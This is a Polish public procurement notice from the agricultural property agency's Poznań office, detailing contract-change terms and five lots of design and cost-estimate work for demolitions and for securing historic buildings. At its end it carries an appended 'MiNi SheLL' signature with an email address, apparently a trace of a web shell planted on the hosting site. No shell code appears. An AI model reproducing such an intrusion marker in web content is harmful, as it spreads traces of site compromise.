<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 2. Wprowadzone zmiany będą dotyczyć umówionego terminu wykonania zamówienia: a) zmiany będące następstwem działania organów administracji w szczególności: - przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp. - odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek dodatkowych wymagań nałożonych przez te organy, - inne przyczyny zewnętrzne niezależne od zamawiającego i wykonawcy skutkujące niemożliwością uzyskania stosownych decyzji, zezwoleń, uzgodnień itp. W przypadku wystąpienia którejkolwiek okoliczności wymienionych w pkt. 2 lit. a) termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty, nie dłużej jednak jak o okres trwania tych okoliczności. Ciężar udowodnienia faktu w takim układzie spoczywa na wykonawcy przedmiotowego zamówienia. 3. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien poinformować Zamawiającego pisemnie. 4. Zmiany osobowe: Zmiana osób, przy pomocy których wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także w SIWZ. Wykonawca może dokonać zmiany osób przedstawionych w ofercie, jedynie za uprzednią zgodą zamawiającego w przypadkach: a)śmierci, choroby lub innych zdarzeń losowych osób, b)nie wywiązywania się osób z obowiązków wynikających z umowy, c)rezygnacji tych osób z wykonywania swoich obowiązków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Poznaniu, ul. Fredry 12, 61 - 701 Poznań, pok. 217..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2013 godzina 08:00, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy w Poznaniu, ul. Fredry 12, 61 - 701 Poznań, Kancelaria Zamawiającego - parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowo - kosztorysowej rozbiórki maszyn i urządzeń znajdujących się w budynku suszarni Zielonek w Jarosławcu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem funkcji nadzoru autorskiego dotyczącej wykonania rozbiórki maszyn i urządzeń, wchodzących w skład środka trwałego o nazwie Urządzenia suszarni nr inw. 430/207/+7, zamontowanych w budynku suszarni Zielonek (nr 101/1/+186, działka nr 38/1) w Jarosławcu. Dokumentacja winna również obejmować kosztorys inwestorski, zawierającego wyliczenie kosztów likwidacji urządzeń suszarni wraz z wyceną materiałów porozbiórkowych i uzyskaniem przez wykonawcę projektu stosownych zezwoleń i uzgodnień właściwych organów (w tym ostatecznych decyzji administracyjnych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wykonanie dokumentacji projektowo - kosztorysowej na wykonanie robót zabezpieczających oficyny mieszkalnej, pałacu i stajni koni w Oporowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem funkcji nadzoru autorskiego i uzyskaniem stosownych zezwoleń i uzgodnień właściwych organów na wykonanie robót zabezpieczających w budynkach:

- oficyny mieszkalnej w msc. Oporowo, gm. Ostroróg (wpisana do rejestru zabytków pod nr. 2648/A, działka o numerze ewidencyjnym 36/4),

- pałacu w msc. Oporowo, gm. Ostroróg (wpisany do rejestru zabytków pod nr 1431/A, działka o numerze ewidencyjnym 36/4),

- stajni koni wyjazdowych z budynkiem bramnym w msc. Oporowo, gm. Ostroróg (wpisanym do rejestru zabytków pod nr 2648/A, działka o numerze ewidencyjnym 36/4).

Roboty zabezpieczające miałyby polegać między innymi na: zamurowaniu z pozostawieniem wentylacji otworów okiennych i drzwiowych, podstemplowaniu istniejących stropów, rozebraniu uszkodzonego dachu, zgodnie z wymogami Wojewódzkiego Konserwatora Zabytków oraz założeniami projektowymi ujętymi poniżej:

Oficyna mieszkalna:
- zabezpieczenie otworów okiennych i drzwiowych poprzez zamurowaniu z pozostawieniem wentylacji,
	- naprawa pokrycia dachowego,
	- naprawa obróbek blacharskich, wymianie rynien, uszczelnieniu i uzupełnieniu rur spustowych;
	
Pałac:
- usunięcie z poziomu parteru gruzu z zawalonych stropów, 
- podstemplowanie istniejących stropów;

Stajnia koni wyjazdowych z budynkiem bramnym:
- zabezpieczenie odkrytych fragmentów murów przed zawilgoceniem,
- zabezpieczenie otworów okiennych i drzwiowych poprzez zamurowaniu z pozostawieniem wentylacji,
- usunięcie i utylizacja zalegających odpadów na stropie budynku bramnego,
- usunięcie zawalonego fragmentu dachu i zabezpieczenie stropu przed zawilgoceniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wykonanie dokumentacji projektowo - kosztorysowej na rozbiórkę części budynku Gościejewice 7, gm. Bojanowo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem funkcji nadzoru autorskiego na rozbiórkę części budynku usytuowanej w kierunku wschodnim od ściany poprzecznej oraz niezbędnych robót zabezpieczających i remontowych w budynku mieszkalnym w msc. Gościejewie nr 7, gm. Bojanowo. 

a) W ramach zamówienia Wykonawca wykona w szczególności:
- inwentaryzację budynku,
- projekty budowlane w zakresie uwzględniającym specyfikę robót budowlanych,
- projekty wykonawcze w zakresie określonym w § 5 Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16.09.2004r. Nr 202,poz. 2072 z późniejszymi zmianami), zwanego w dalszej części Rozporządzeniem,
- przedmiar robót w zakresie, o którym mowa w § 6 Rozporządzenia,
- informację dotyczącą  bezpieczeństwa i ochrony zdrowia,
- specyfikację techniczną wykonania i odbioru robót budowlanych opracowaną zgodnie z Rozporządzeniem - rozdział 3 Rozporządzenia,
- kosztorys inwestorski uproszczony sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym ( Dz. U. z dnia 08.06.2004r. Nr 130, poz. 1389 z późn. zm.);

b) strona tytułowa dokumentacji projektowej powinna być oznaczona zgodnie z wytycznymi zawartymi w § 11 Rozporządzenia;

c) zakres opracowania dokumentacji :
- na podstawie zatwierdzonej przez PINB w Rawiczu ekspertyzy technicznej budynku,
- oraz inne niezbędne roboty wynikające z oceny stanu technicznego obiektu dokonanego przez   wykonawcę dokumentacji w uzgodnieniu z Zamawiającym;

d) dokumentację należy opracować na podstawie przeprowadzonej wizji lokalnej oraz uzgodnień z osobą uprawnioną do kontaktu w sprawie zamówienia;

e) należy uzyskać stosowne pozwolenia wymagane w ustawie Prawo Budowlane, umożliwiające realizację remontu;

f) komplet dokumentacji obejmuje także załączoną dokumentację w formie elektronicznej w dwóch częściach : 
cz. 1 - dokumentacja projektowa i wykonawcza wraz z szczegółową  specyfikacją techniczną wykonania i odbioru robót + przedmiar + kosztorys inwestorski,
cz. 2 -  dokumentacja projektowa i wykonawcza wraz z szczegółową  specyfikacją techniczną wykonania i odbioru robót + przedmiar + kosztorys ofertowy;

g) wykonawca  w ramach zamówienia zobowiązany jest do aktualizacji kosztorysu inwestorskiego w okresie 24 miesięcy od dnia odbioru dokumentacji przez zamawiającego;

h) inwestor, w przypadku zaistnienia takiej potrzeby, przekaże Wykonawcy, w terminie 2 dni od chwili złożenia pisemnego zgłoszenia, niezbędne pełnomocnictwa i upoważnienia O/T ANR w Poznaniu, w celu składania oświadczeń woli w imieniu zamawiającego na uzyskanie stosownych pozwoleń i uzgodnień niezbędnych do wykonania zamówienia;

i) wykonana dokumentacja podlega weryfikacji przez zamawiającego zgodnie z umową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wykonanie dokumentacji projektowo - kosztorysowej na rozbiórkę zbiorników na ścieki wraz z kanalizacją sanitarną w msc. Uzarzewo, Dobrojewo, Sapowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej na wykonanie rozbiórki bezodpływowych zbiorników na ścieki wraz z kanalizacją sanitarną w msc. Uzarzewo, gm. Swarzędz dz. nr 38/9, Dobrojewo gm. Ostroróg dz. nr 27/1, 27/16 , Sapowice gm. Stęszew dz. nr 209/3. 

a) W ramach zamówienia Wykonawca wykona:
- projekt budowlany w zakresie uwzględniającym specyfikę robót budowlanych,
- przedmiar robót w zakresie o którym mowa w § 6 Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16.09.2004r. Nr 202,poz. 2072 z późniejszymi zmianami),
- informację dotyczącą  bezpieczeństwa i ochrony zdrowia,
- specyfikację techniczną wykonania i odbioru robót budowlanych    
   opracowaną zgodnie z Rozporządzeniem - rozdział 3 Rozporządzenia,
- kosztorys inwestorski sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.,05.2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz. U. z dnia 08.06.2004r. Nr 130, poz. 1389 z późniejszymi zmianami);

b) strona tytułowa dokumentacji projektowej powinna być oznaczona zgodnie z wytycznymi zawartymi w § 11 Rozporządzenia;

c) zakres opracowania dokumentacji dotyczy:

- rozbiórki podziemnych żelbetowych bezodpływowych zbiorników na ścieki: Uzarzewo - 3 zbiorniki dz. nr 38/9, Dobrojewo - 3 zbiorniki dz. nr 27/1, 27/16 (1szt) dz.nr 27/5 (1szt), dz.nr 27/4, 27/5 (1szt),  Sapowice - 5 zbiorników dz. nr 209/3. Zamawiający zaleca przeprowadzenie wizji lokalnej. Koszty dokonania wizji lokalnej ponosi Wykonawca.
 - rozebranie górnych płyt zbiorników, rozebranie bocznych ścian zbiorników na głębokość ok. 1,0m pod poziom gruntu, wykonanie otworów w dnach zbiorników,
- zasypanie zbiorników piaskiem wraz z dezynfekcją wapnem chlorowanym warstwami co 25cm
- rozbiórki rurociągu kanalizacyjnego doprowadzającego ścieki do zbiorników (w obrębie działek, na których znajdują się zbiorniki - dotyczy: Dobrojewa),
- zabezpieczenia i oznakowania terenu prac rozbiórkowych,
-  przywrócenie terenu do stanu zastanego (zniwelowanie, wyrównanie gruntu, w przypadku uszkodzenia dróg dojazdowych utwardzenie),
-  w części kosztorysowej dokumentacji ujęcie pozycji - geodezja powykonawcza, wywóz i utylizacja odpadów; gruz - oraz inne niezbędne roboty wynikające z oceny (dokonanej przez wykonawcę dokumentacji) stanu technicznego obiektu a umożliwiające prawidłową realizację przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> wykonanie dokumentacji projektowo - kosztorysowej na rozbiórkę komina stalowego w msc. Glinno..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej na wykonanie rozbiórki komina stalowego w msc. Glinno, Gm. Skoki dz. nr 29/15. 

a) W ramach zamówienia Wykonawca wykona:
- projekt budowlany w zakresie uwzględniającym specyfikę robót budowlanych,
- przedmiar robót w zakresie o którym mowa w § 6 Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16.09.2004r. Nr 202,poz. 2072 z późniejszymi zmianami),
- informację dotyczącą  bezpieczeństwa i ochrony zdrowia,
- specyfikację techniczną wykonania i odbioru robót budowlanych    
   opracowaną zgodnie z Rozporządzeniem - rozdział 3 Rozporządzenia,
- kosztorys inwestorski sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.,05.2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz. U. z dnia 08.06.2004r. Nr 130, poz. 1389 z późniejszymi zmianami);

b) strona tytułowa dokumentacji projektowej powinna być oznaczona zgodnie z wytycznymi zawartymi w § 11 Rozporządzenia;
 
c) zakres opracowania dokumentacji dotyczy:

- rozbiórki nieczynnego komina stalowego wolnostojącego przy budynku. Wysokość komina ok. 17,0m (uwaga: przy budynku są dwa kominy - rozbiórce podlega wyższy, nieczynny),
 - rozbiórki betonowej podstawy komina  o wym. 1,7*1,7*0,5 - część nadziemna całość, część podziemna ok.15cm pod poziom gruntu,
- zabezpieczenia i oznakowanie terenu prac rozbiórkowych,
- przywrócenie terenu do stanu zastanego (zniwelowanie, wyrównanie gruntu w przypadku dróg dojazdowych utwardzenie), 
-  w części kosztorysowej dokumentacji ująć należy pozycję dotyczącą wyliczenia (tylko ilości bez wartości) materiałów odpadowych tj złom stalowy, gruz stających się własnością wykonawcy robót rozbiórkowych oraz pozycję geodezja powykonawcza,  
-  oraz inne niezbędne roboty wynikające z oceny (dokonanej przez wykonawcę dokumentacji) stanu technicznego obiektu a umożliwiające prawidłową realizację przedmiotu zamówienia;

d) opracowanie dokumentacji należy poprzedzić :
- uzgodnieniami z osobą upoważnioną do kontaktu w sprawie zamówienia, 
- przeprowadzenie wizji lokalnej. Koszty dokonania wizji lokalnej ponosi Wykonawca;

e) należy uzyskać wszystkie wymagane prawomocne decyzje, pozwolenia, zgody umożliwiające realizację zadania;

f) komplet dokumentacji obejmuje także załączoną dokumentację w formie  elektronicznej w dwóch częściach : 
cz. 1 - dokumentacja projektowa wraz ze szczegółową  specyfikacją techniczną wykonania i odbioru robót + przedmiar + kosztorys inwestorski (osobna płyta),
cz. 2 -  dokumentacja projektowa wraz z szczegółową  specyfikacją techniczną wykonania i odbioru robót + przedmiar + kosztorys  ślepy (osobna płyta);

g) wykonawca  w ramach zamówienia zobowiązany jest do aktualizacji kosztorysu inwestorskiego w okresie 24 miesięcy od dnia odbioru dokumentacji przez  zamawiającego;

h) inwestor, w przypadku zaistnienia takiej potrzeby, przekaże Wykonawcy, w terminie 2 dni od chwili złożenia pisemnego zgłoszenia, niezbędne pełnomocnictwa i upoważnienia O/T ANR w Poznaniu, w celu składania oświadczeń woli w imieniu zamawiającego na uzyskanie stosownych pozwoleń i uzgodnień niezbędnych do wykonania zamówienia;

i) wykonana dokumentacja podlega weryfikacji przez zamawiającego. Po dokonaniu weryfikacji i usunięciu ewentualnych braków przez wykonawcę sporządzony zostanie protokół odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com